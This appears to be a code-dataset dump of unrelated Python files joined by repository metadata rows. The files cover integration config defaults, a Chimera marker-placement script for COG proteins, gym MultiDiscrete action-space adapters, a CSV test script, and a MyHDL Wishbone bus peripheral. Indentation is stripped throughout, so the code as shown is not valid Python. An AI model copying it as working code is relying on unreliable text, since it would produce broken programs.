def instance_password(field, value):
return get_default_field_value(field, value)
def instance_persist_connections(field, value):
return False
def instance_proxy(field, value):
return get_default_field_value(field, value)
def instance_read_timeout(field, value):
return get_default_field_value(field, value)
def instance_request_size(field, value):
return 16
def instance_service(field, value):
return get_default_field_value(field, value)
def instance_skip_proxy(field, value):
return False
def instance_spark_cluster_mode(field, value):
return 'spark_yarn_mode'
def instance_spark_pre_20_mode(field, value):
return False
def instance_spark_proxy_enabled(field, value):
return False
def instance_spark_ui_ports(field, value):
return get_default_field_value(field, value)
def instance_streaming_metrics(field, value):
return True
def instance_tags(field, value):
return get_default_field_value(field, value)
def instance_timeout(field, value):
return 10
def instance_tls_ca_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_cert(field, value):
return get_default_field_value(field, value)
def instance_tls_ignore_warning(field, value):
return False
def instance_tls_private_key(field, value):
return get_default_field_value(field, value)
def instance_tls_protocols_allowed(field, value):
return get_default_field_value(field, value)
def instance_tls_use_host_header(field, value):
return False
def instance_tls_verify(field, value):
return True
def instance_use_legacy_auth_encoding(field, value):
return True
def instance_username(field, value):
return get_default_field_value(field, value)
| [
"noreply@github.com"
] | Smartling.noreply@github.com |
1b41f116c60d3c8d155ed5e0725cee3fe36d6003 | 711756b796d68035dc6a39060515200d1d37a274 | /output_cog/optimized_10979.py | 047db6f3b4fa315907783783e7952cbd8d5c97a1 | [] | no_license | batxes/exocyst_scripts | 8b109c279c93dd68c1d55ed64ad3cca93e3c95ca | a6c487d5053b9b67db22c59865e4ef2417e53030 | refs/heads/master | 2020-06-16T20:16:24.840725 | 2016-11-30T16:23:16 | 2016-11-30T16:23:16 | 75,075,164 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,841 | py | import _surface
import chimera
try:
import chimera.runCommand
except:
pass
from VolumePath import markerset as ms
try:
from VolumePath import Marker_Set, Link
new_marker_set=Marker_Set
except:
from VolumePath import volume_path_dialog
d= volume_path_dialog(True)
new_marker_set= d.new_marker_set
marker_sets={}
surf_sets={}
if "Cog2_GFPN" not in marker_sets:
s=new_marker_set('Cog2_GFPN')
marker_sets["Cog2_GFPN"]=s
s= marker_sets["Cog2_GFPN"]
mark=s.place_marker((472.606, 446.682, 470.856), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_0" not in marker_sets:
s=new_marker_set('Cog2_0')
marker_sets["Cog2_0"]=s
s= marker_sets["Cog2_0"]
mark=s.place_marker((516.31, 394.95, 487.065), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_1" not in marker_sets:
s=new_marker_set('Cog2_1')
marker_sets["Cog2_1"]=s
s= marker_sets["Cog2_1"]
mark=s.place_marker((572.657, 340.907, 508.949), (0.89, 0.1, 0.1), 17.1475)
if "Cog2_GFPC" not in marker_sets:
s=new_marker_set('Cog2_GFPC')
marker_sets["Cog2_GFPC"]=s
s= marker_sets["Cog2_GFPC"]
mark=s.place_marker((604.141, 475.395, 499.212), (0.89, 0.1, 0.1), 18.4716)
if "Cog2_Anch" not in marker_sets:
s=new_marker_set('Cog2_Anch')
marker_sets["Cog2_Anch"]=s
s= marker_sets["Cog2_Anch"]
mark=s.place_marker((669.213, 182.358, 565.998), (0.89, 0.1, 0.1), 18.4716)
if "Cog3_GFPN" not in marker_sets:
s=new_marker_set('Cog3_GFPN')
marker_sets["Cog3_GFPN"]=s
s= marker_sets["Cog3_GFPN"]
mark=s.place_marker((501.799, 410.933, 475.449), (1, 1, 0), 18.4716)
if "Cog3_0" not in marker_sets:
s=new_marker_set('Cog3_0')
marker_sets["Cog3_0"]=s
s= marker_sets["Cog3_0"]
mark=s.place_marker((500.779, 411.934, 474.57), (1, 1, 0.2), 17.1475)
if "Cog3_1" not in marker_sets:
s=new_marker_set('Cog3_1')
marker_sets["Cog3_1"]=s
s= marker_sets["Cog3_1"]
mark=s.place_marker((483.637, 410.327, 452.123), (1, 1, 0.2), 17.1475)
if "Cog3_2" not in marker_sets:
s=new_marker_set('Cog3_2')
marker_sets["Cog3_2"]=s
s= marker_sets["Cog3_2"]
mark=s.place_marker((482.322, 410.341, 423.969), (1, 1, 0.2), 17.1475)
if "Cog3_3" not in marker_sets:
s=new_marker_set('Cog3_3')
marker_sets["Cog3_3"]=s
s= marker_sets["Cog3_3"]
mark=s.place_marker((504.37, 424.589, 413.88), (1, 1, 0.2), 17.1475)
if "Cog3_4" not in marker_sets:
s=new_marker_set('Cog3_4')
marker_sets["Cog3_4"]=s
s= marker_sets["Cog3_4"]
mark=s.place_marker((531.597, 424.802, 407.089), (1, 1, 0.2), 17.1475)
if "Cog3_5" not in marker_sets:
s=new_marker_set('Cog3_5')
marker_sets["Cog3_5"]=s
s= marker_sets["Cog3_5"]
mark=s.place_marker((521.047, 409.602, 385.431), (1, 1, 0.2), 17.1475)
if "Cog3_GFPC" not in marker_sets:
s=new_marker_set('Cog3_GFPC')
marker_sets["Cog3_GFPC"]=s
s= marker_sets["Cog3_GFPC"]
mark=s.place_marker((476.39, 422.347, 481.528), (1, 1, 0.4), 18.4716)
if "Cog3_Anch" not in marker_sets:
s=new_marker_set('Cog3_Anch')
marker_sets["Cog3_Anch"]=s
s= marker_sets["Cog3_Anch"]
mark=s.place_marker((556.118, 393.695, 285.889), (1, 1, 0.4), 18.4716)
if "Cog4_GFPN" not in marker_sets:
s=new_marker_set('Cog4_GFPN')
marker_sets["Cog4_GFPN"]=s
s= marker_sets["Cog4_GFPN"]
mark=s.place_marker((626.632, 238.367, 394.303), (0, 0, 0.8), 18.4716)
if "Cog4_0" not in marker_sets:
s=new_marker_set('Cog4_0')
marker_sets["Cog4_0"]=s
s= marker_sets["Cog4_0"]
mark=s.place_marker((626.632, 238.367, 394.303), (0, 0, 0.8), 17.1475)
if "Cog4_1" not in marker_sets:
s=new_marker_set('Cog4_1')
marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((619.014, 260.531, 411.913), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((608.666, 282.727, 427.453), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((594.318, 304.021, 440.93), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((574.49, 321.374, 452.927), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((550.53, 336.029, 460.177), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((526.271, 351.421, 463.61), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((687.527, 305.769, 267.106), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((361.666, 402.873, 657.674), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((530.413, 323.206, 494.803), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((530.413, 323.206, 494.803), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((535.713, 341.858, 515.775), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((554.804, 355.738, 531.501), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((579.671, 370.046, 524.486), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((514.22, 474.272, 501.131), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((654.362, 272.069, 543.897), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((522.246, 421.449, 497.816), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((522.325, 421.657, 497.917), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((528.926, 448.925, 493.7), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((525.49, 443.617, 466.579), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((528.938, 421.778, 449.96), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((519.183, 399.955, 435.926), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((507.757, 390.165, 412.546), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((493.832, 390.261, 388.571), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((464.363, 348.833, 458.48), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((526.866, 432.712, 320.545), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((472.52, 348.796, 503.932), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((495.729, 359.289, 506.679), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((545.111, 383.885, 515.731), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((596.625, 409.986, 525.826), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((550.694, 472.176, 554.058), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((700.631, 400.298, 519.022), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((560.029, 441.292, 471.093), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((558.982, 423.595, 493.055), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((563.998, 411.171, 518.186), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((564.813, 394.385, 541.735), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((565.328, 370.395, 558.742), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((559.514, 341.645, 563.983), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((508.2, 381.965, 516.924), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((604.056, 290.983, 611.756), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
a27e6fda0829bcf2949b2f4b94f7d4b701045abb | 1ec1e418fc5c9aac055c9218f1074332adf1e720 | /rand_param_envs/gym/spaces/multi_discrete.py | ed68170ee4f98ee8e0c3e89670daccd81b829023 | [] | no_license | CHEN-yongquan/mier_public | 344e34137343aa564b261c7125edac3b3ff10eb0 | af56fa84811dc7a697feb1b9dff01836d2148810 | refs/heads/master | 2022-10-15T13:21:35.198458 | 2020-06-12T08:22:16 | 2020-06-12T08:22:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,827 | py | import numpy as np
from rand_param_envs import gym
from rand_param_envs.gym.spaces import prng, Discrete, Box
from rand_param_envs.gym.error import Error
class MultiDiscrete(gym.Space):
"""
- The multi-discrete action space consists of a series of discrete action spaces with different parameters
- It can be adapted to both a Discrete action space or a continuous (Box) action space
- It is useful to represent game controllers or keyboards where each key can be represented as a discrete action space
- It is parametrized by passing an array of arrays containing [min, max] for each discrete action space
where the discrete action space can take any integers from `min` to `max` (both inclusive)
Note: A value of 0 always need to represent the NOOP action.
e.g. Nintendo Game Controller
- Can be conceptualized as 3 discrete action spaces:
1) Arrow Keys: Discrete 5 - NOOP[0], UP[1], RIGHT[2], DOWN[3], LEFT[4] - params: min: 0, max: 4
2) Button A: Discrete 2 - NOOP[0], Pressed[1] - params: min: 0, max: 1
3) Button B: Discrete 2 - NOOP[0], Pressed[1] - params: min: 0, max: 1
- Can be initialized as
MultiDiscrete([ [0,4], [0,1], [0,1] ])
"""
def __init__(self, array_of_param_array):
self.low = np.array([x[0] for x in array_of_param_array])
self.high = np.array([x[1] for x in array_of_param_array])
self.num_discrete_space = self.low.shape[0]
def sample(self):
""" Returns a array with one sample from each discrete action space """
# For each row: round(random .* (max - min) + min, 0)
random_array = prng.np_random.rand(self.num_discrete_space)
return [int(x) for x in np.floor(np.multiply((self.high - self.low + 1.), random_array) + self.low)]
def contains(self, x):
return len(x) == self.num_discrete_space and (np.array(x) >= self.low).all() and (
np.array(x) <= self.high).all()
@property
def shape(self):
return self.num_discrete_space
def __repr__(self):
return "MultiDiscrete" + str(self.num_discrete_space)
def __eq__(self, other):
return np.array_equal(self.low, other.low) and np.array_equal(self.high, other.high)
# Adapters
class DiscreteToMultiDiscrete(Discrete):
"""
Adapter that adapts the MultiDiscrete action space to a Discrete action space of any size
The converted action can be retrieved by calling the adapter with the discrete action
discrete_to_multi_discrete = DiscreteToMultiDiscrete(multi_discrete)
discrete_action = discrete_to_multi_discrete.sample()
multi_discrete_action = discrete_to_multi_discrete(discrete_action)
It can be initialized using 3 configurations:
Configuration 1) - DiscreteToMultiDiscrete(multi_discrete) [2nd param is empty]
Would adapt to a Discrete action space of size (1 + nb of discrete in MultiDiscrete)
where
0 returns NOOP [ 0, 0, 0, ...]
1 returns max for the first discrete space [max, 0, 0, ...]
2 returns max for the second discrete space [ 0, max, 0, ...]
etc.
Configuration 2) - DiscreteToMultiDiscrete(multi_discrete, list_of_discrete) [2nd param is a list]
Would adapt to a Discrete action space of size (1 + nb of items in list_of_discrete)
e.g.
if list_of_discrete = [0, 2]
0 returns NOOP [ 0, 0, 0, ...]
1 returns max for first discrete in list [max, 0, 0, ...]
2 returns max for second discrete in list [ 0, 0, max, ...]
etc.
Configuration 3) - DiscreteToMultiDiscrete(multi_discrete, discrete_mapping) [2nd param is a dict]
Would adapt to a Discrete action space of size (nb_keys in discrete_mapping)
where discrete_mapping is a dictionnary in the format { discrete_key: multi_discrete_mapping }
e.g. for the Nintendo Game Controller [ [0,4], [0,1], [0,1] ] a possible mapping might be;
mapping = {
0: [0, 0, 0], # NOOP
1: [1, 0, 0], # Up
2: [3, 0, 0], # Down
3: [2, 0, 0], # Right
4: [2, 1, 0], # Right + A
5: [2, 0, 1], # Right + B
6: [2, 1, 1], # Right + A + B
7: [4, 0, 0], # Left
8: [4, 1, 0], # Left + A
9: [4, 0, 1], # Left + B
10: [4, 1, 1], # Left + A + B
11: [0, 1, 0], # A only
12: [0, 0, 1], # B only,
13: [0, 1, 1], # A + B
}
"""
def __init__(self, multi_discrete, options=None):
assert isinstance(multi_discrete, MultiDiscrete)
self.multi_discrete = multi_discrete
self.num_discrete_space = self.multi_discrete.num_discrete_space
# Config 1
if options is None:
self.n = self.num_discrete_space + 1 # +1 for NOOP at beginning
self.mapping = {i: [0] * self.num_discrete_space for i in range(self.n)}
for i in range(self.num_discrete_space):
self.mapping[i + 1][i] = self.multi_discrete.high[i]
# Config 2
elif isinstance(options, list):
assert len(options) <= self.num_discrete_space
self.n = len(options) + 1 # +1 for NOOP at beginning
self.mapping = {i: [0] * self.num_discrete_space for i in range(self.n)}
for i, disc_num in enumerate(options):
assert disc_num < self.num_discrete_space
self.mapping[i + 1][disc_num] = self.multi_discrete.high[disc_num]
# Config 3
elif isinstance(options, dict):
self.n = len(options.keys())
self.mapping = options
for i, key in enumerate(options.keys()):
if i != key:
raise Error('DiscreteToMultiDiscrete must contain ordered keys. ' \
'Item {0} should have a key of "{0}", but key "{1}" found instead.'.format(i, key))
if not self.multi_discrete.contains(options[key]):
raise Error('DiscreteToMultiDiscrete mapping for key {0} is ' \
'not contained in the underlying MultiDiscrete action space. ' \
'Invalid mapping: {1}'.format(key, options[key]))
# Unknown parameter provided
else:
raise Error('DiscreteToMultiDiscrete - Invalid parameter provided.')
def __call__(self, discrete_action):
return self.mapping[discrete_action]
class BoxToMultiDiscrete(Box):
"""
Adapter that adapts the MultiDiscrete action space to a Box action space
The converted action can be retrieved by calling the adapter with the box action
box_to_multi_discrete = BoxToMultiDiscrete(multi_discrete)
box_action = box_to_multi_discrete.sample()
multi_discrete_action = box_to_multi_discrete(box_action)
It can be initialized using 2 configurations:
Configuration 1) - BoxToMultiDiscrete(multi_discrete) [2nd param is empty]
Would adapt to a Box action space of shape (nb of discrete space, ), with the min-max of
each Discrete space sets as Box boundaries
e.g. a MultiDiscrete with parameters [ [0,4], [0,1], [0,1] ], adapted through BoxToMultiDiscrete(multi_discrete)
would adapt to a Box with parameters low=np.array([0.0, 0.0, 0.0]) high=np.array([4.0, 1.0, 1.0])
The box action would then be rounded to the nearest integer.
e.g. [ 2.560453, 0.3523456, 0.674546 ] would be converted to the multi discrete action of [3, 0, 1]
Configuration 2) - BoxToMultiDiscrete(multi_discrete, list_of_discrete) [2nd param is a list]
Would adapt to a Box action space of shape (nb of items in list_of_discrete, ), where list_of_discrete
is the index of the discrete space in the MultiDiscrete space
e.g. a MultiDiscrete with parameters [ [0,4], [0,1], [0,1] ], adapted through BoxToMultiDiscrete(multi_discrete, [2, 0])
would adapt to a Box with parameters low=np.array([0.0, 0.0]) high=np.array([1.0, 4.0])
where
0.0 = min(discrete space #2), 1.0 = max(discrete space #2)
0.0 = min(discrete space #0), 4.0 = max(discrete space #0)
The box action would then be rounded to the nearest integer and mapped to the correct discrete space in multi-discrete.
e.g. [ 0.7412057, 3.0174142 ] would be converted to the multi discrete action of [3, 0, 1]
This configuration is useful if you want to ignore certain discrete spaces in the MultiDiscrete space.
"""
def __init__(self, multi_discrete, options=None):
assert isinstance(multi_discrete, MultiDiscrete)
self.multi_discrete = multi_discrete
self.num_discrete_space = self.multi_discrete.num_discrete_space
if options is None:
options = list(range(self.num_discrete_space))
if not isinstance(options, list):
raise Error('BoxToMultiDiscrete - Invalid parameter provided.')
assert len(options) <= self.num_discrete_space
self.low = np.array([self.multi_discrete.low[x] for x in options])
self.high = np.array([self.multi_discrete.high[x] for x in options])
self.mapping = {i: disc_num for i, disc_num in enumerate(options)}
def __call__(self, box_action):
multi_discrete_action = [0] * self.num_discrete_space
for i in self.mapping:
multi_discrete_action[self.mapping[i]] = int(round(box_action[i], 0))
return multi_discrete_action
| [
"russellm@berkeley.edu"
] | russellm@berkeley.edu |
2f21c748d4601d3ee19276f8b0c2227ee5efcd28 | 88030f69f438cbeed773d144949c00859a447a52 | /tests/delimited_file_utils/test_delimited_file_utils.py | a0a223117aa766b4de1fbb2e21a722e85ac8d3d9 | [] | no_license | ryanGT/krauss_misc | 05f5845e9915e522cb595b165e81b580019969db | d693dfd19a42ba893a0200630a0f3435711666ee | refs/heads/main | 2022-09-27T22:57:06.738155 | 2022-09-02T14:51:13 | 2022-09-02T14:51:13 | 240,044 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | import delimited_file_utils
import glob
from numpy import array
files = glob.glob('email_update_grades_test*.csv')
good_labels = array(['Group Name','Content/Progress','Clarity','Writing','Apparent Effort','Overall Grade','Notes'])
passes = []
failures = []
for curfile in files:
curarray = delimited_file_utils.open_delimited_with_sniffer_and_check(curfile)
labels = curarray[0,:]
data = curarray[1:,:]
bool_vect = labels == good_labels
test1 = bool_vect.all()
test2 = data.shape == (9,7)
if test1 and test2:
passes.append(curfile)
else:
failures.append(curfile)
if len(failures) == 0:
print('all tests pass')
else:
print('passes:')
for curfile in passes:
print(curfile)
print('-----------------------------')
print('failures:')
for curfile in failures:
print(curfile)
| [
"ryanlists@gmail.com"
] | ryanlists@gmail.com |
83b98e9a60f3fc990acabf8240a72eb92b301126 | 4036b33e022b3ad7e631ee097c6abc6ae7dcc890 | /rhea/system/memmap/wishbone.py | 3f41aa3a374d1a076e7be84aa6575ab4014e427d | [
"MIT"
] | permissive | hgomersall/rhea | 5490e463f492c7375fd40c00a4a9d585eac878c1 | 5c9f0139091df95ea824884ed7c287c5992cf472 | refs/heads/master | 2020-12-25T08:37:06.346994 | 2016-02-25T12:31:02 | 2016-02-25T12:31:02 | 52,529,794 | 1 | 0 | null | 2016-02-25T14:13:35 | 2016-02-25T14:13:35 | null | UTF-8 | Python | false | false | 12,140 | py | #
# Copyright (c) 2014-2015 Christopher L. Felton
#
from __future__ import absolute_import
from myhdl import (Signal, intbv, always, always_seq, always_comb,
instance, instances, concat, enum, now)
from ..glbl import Global
from . import MemoryMapped
from . import Barebone
class Wishbone(MemoryMapped):
name = 'wishbone'
def __init__(self, glbl=None, data_width=8, address_width=16, name=None):
""" Wishbose bus object
Parameters (kwargs):
--------------------
:param glbl: system clock and reset
:param data_width: data bus width
:param address_width: address bus width
:param name: name for the bus
"""
# @todo: ?? not sure if this how the arguments should
# should be handled. Passing args is simple but a
# little obscure ??
super(Wishbone, self).__init__(data_width=data_width,
address_width=address_width)
# note on Wishbone signal names, since the signals
# are not passed to the controller and peripherals
# (the interface is passed) there isn't a need for
# _o and _i on many of the signals.
# Preserved the peripheral (slave) point of view names.
if glbl is not None:
self.clock = glbl.clock
self.clk_i = self.clock
if glbl is not None and glbl.reset is not None:
self.reset = glbl.reset
self.rst_i = self.reset
self.cyc_i = Signal(bool(0))
self.stb_i = Signal(bool(0))
self.adr_i = Signal(intbv(0)[address_width:])
self.we_i = Signal(bool(0))
self.sel_i = Signal(bool(0))
self.dat_i = Signal(intbv(0)[data_width:])
# outputs from the peripherals
self.dat_o = Signal(intbv(0)[data_width:])
self.ack_o = Signal(bool(0))
# peripheral outputs
self._pdat_o = []
self._pack_o = []
self.timeout = 1111
self._add_bus(name)
def add_output_bus(self, dat, ack):
self._pdat_o.append(dat)
self._pack_o.append(ack)
def interconnect(self):
""" combine all the peripheral outputs
"""
assert len(self._pdat_o) == len(self._pack_o)
ndevs = len(self._pdat_o)
wb = self
@always_seq(self.clk_i.posedge, reset=self.rst_i)
def rtl_or_combine():
dats = 0
acks = 0
for ii in range(ndevs):
dats = dats | wb._pdat_o[ii]
acks = acks | wb._pack_o[ii]
wb.dat_o.next = dats
wb.ack_o.next = acks
return rtl_or_combine
def peripheral_regfile(self, regfile, name=''):
""" memory-mapped wishbone peripheral interface
"""
# local alias
wb = self # register bus
rf = regfile # register file definition
clock, reset = wb.clk_i, wb.rst_i
# @todo: base address default needs to be revisited
# if the base_address is not set, simply set to 0 for now ...
base_address = regfile.base_address
if base_address is None:
base_address = 0
# get the address list (al), register list (rl), read-only list (rol),
# and the default list (dl).
al, rl, rol, dl = rf.get_reglist()
addr_list, regs_list = al, rl
pwr, prd = rf.get_strobelist()
nregs = len(regs_list)
max_address = base_address + max(addr_list)
lwb_do = Signal(intbv(0)[self.data_width:])
(lwb_sel, lwb_acc, lwb_wr,
lwb_wrd, lwb_ack,) = [Signal(bool(0)) for _ in range(5)]
wb.add_output_bus(lwb_do, lwb_ack)
num_ackcyc = 1 # the number of cycle delays after cyc_i
ackcnt = Signal(intbv(num_ackcyc, min=0, max=num_ackcyc+1))
newcyc = Signal(bool(0))
if self._debug:
@instance
def debug_check():
print("base address {:4X}, max address {:4X}".format(
int(base_address), int(max_address)))
while True:
assert clock is wb.clk_i is self.clock
assert reset is wb.rst_i is self.reset
yield clock.posedge
print("{:8d}: c:{}, r:{}, {} {} {} sel:{}, wr:{} n:{} "
"acnt {}, @{:04X}, i:{:02X} o:{:02X} ({:02X})".format(
now(), int(clock), int(reset),
int(wb.cyc_i), int(wb.we_i), int(wb.ack_o),
int(lwb_sel), int(lwb_wr),
int(newcyc), int(ackcnt), int(wb.adr_i),
int(wb.dat_i), int(wb.dat_o), int(lwb_do), ))
@always_comb
def rtl_assign():
lwb_acc.next = wb.cyc_i and wb.stb_i
lwb_wr.next = wb.cyc_i and wb.stb_i and wb.we_i
@always_seq(clock.posedge, reset=reset)
def rtl_selected():
if (wb.cyc_i and wb.adr_i >= base_address and
wb.adr_i < max_address):
lwb_sel.next = True
else:
lwb_sel.next = False
@always_seq(clock.posedge, reset=reset)
def rtl_bus_cycle():
# set default, only active one cycle
newcyc.next = False
if wb.cyc_i:
if ackcnt > 0:
ackcnt.next = ackcnt - 1
if ackcnt == 1:
newcyc.next = True
else:
ackcnt.next = num_ackcyc
@always_comb
def rtl_ack():
if wb.cyc_i and newcyc:
lwb_ack.next = True
else:
lwb_ack.next = False
# @todo: scan the register list, if it is contiguous remove
# the base and use the offset directly to access the
# register list instead of the for loop
# if rf.contiguous:
# @always_seq(rb.clk_i.posedge, reset=rb.rst_i)
# def rtl_read():
# else:
# Handle a bus read (transfer the addressed register to the
# data bus) and generate the register read pulse (let the
# peripheral know the register has been read).
# @always_seq(clock.posedge, reset=reset)
@always_comb
def rtl_read():
if lwb_sel and not lwb_wr and newcyc:
for ii in range(nregs):
aa = addr_list[ii]
aa = aa + base_address
if wb.adr_i == aa:
lwb_do.next = regs_list[ii]
prd[ii].next = True
else:
lwb_do.next = 0
for ii in range(nregs):
prd[ii].next = False
# Handle a bus write (transfer the data bus to the addressed
# register) and generate a register write pulse (let the
# peripheral know the register has been written).
@always(clock.posedge)
def rtl_write():
if reset == int(reset.active):
for ii in range(nregs):
ro = rol[ii]
dd = dl[ii]
if not ro:
regs_list[ii].next = dd
pwr[ii].next = False
else:
if lwb_wr and lwb_sel and newcyc:
for ii in range(nregs):
aa = addr_list[ii]
aa = aa + base_address
ro = rol[ii]
if not ro and wb.adr_i == aa:
regs_list[ii].next = wb.dat_i
